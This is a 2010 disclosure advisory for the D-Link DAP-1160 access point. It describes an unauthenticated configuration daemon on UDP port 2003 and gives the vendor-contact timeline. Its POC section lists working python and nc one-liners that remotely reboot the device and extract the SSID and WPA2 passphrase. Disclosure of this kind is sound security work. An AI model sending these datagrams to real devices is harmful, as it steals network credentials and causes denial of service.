Security Advisory IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Advisory Information -------------------- Published: 2010-06-28 Updated: 2010-06-28 Manufacturer: D-Link Model: DAP-1160 Firmware version: 1.20b06 1.30b10 1.31b01 Vulnerability Details --------------------- Public References: Not Assigned Platform: Successfully tested on D-Link DAP-1160 loaded with firmware versions: v120b06, v130b10, v131b01. Other models and/or firmware versions may be also affected. Note: Only firmware version major numbers are displayed on the administration web interface: 1.20, 1.30, 1.31 Background Information: D-Link DAP-1160 is a wireless access points that allow wireless clients connectivity to wired networks. Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported. Summary: Unauthenticated access and modification of several device parameters, including Wi-Fi SSID, keys and passphrases is possible. Unauthenticated remote reboot of the device can be also performed. Details: DCCD is an UDP daemon that listens on port UDP 2003 of the device, that is likely used for easy device configuration via the DCC (D-Link Click 'n Connect) protocol. By sending properly formatted UDP datagrams to dccd daemon it is possible to perform security relevant operation without any previous authentication. It is possible to remotely retrieve sensitive wireless configuration parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases, along with other additional information. It is also possible to remotely modify such parameters and configure the device without any knowledge of the web administration password. Remote reboot is another operation that an attacker may perform in an unauthenticated way, possibly triggering a Denial-of-Service condition. POC: - Remote reboot python -c 'print "\x05" + "\x00" * 7' | nc -u 2003 - Retrieving Wi-Fi SSID python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u 2003 cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the received datagram) - Retrieving WPA2 PSK python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt 2003 cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram) Impacts: Remote extraction of sensitive information Modification of existing device configuration POssible Denial-of-Service Solutions & Workaround: Not available Additional Information ---------------------- Timeline (dd/mm/yy): 17/02/2010: Vulnerability discovered 17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website 18/02/2010: Point of contact requested to customer service ----------- No response ----------- 26/05/2010: Partial disclosure at CONFidence 2010 28/06/2010: This advisory Additional information available at http://www.icysilence.org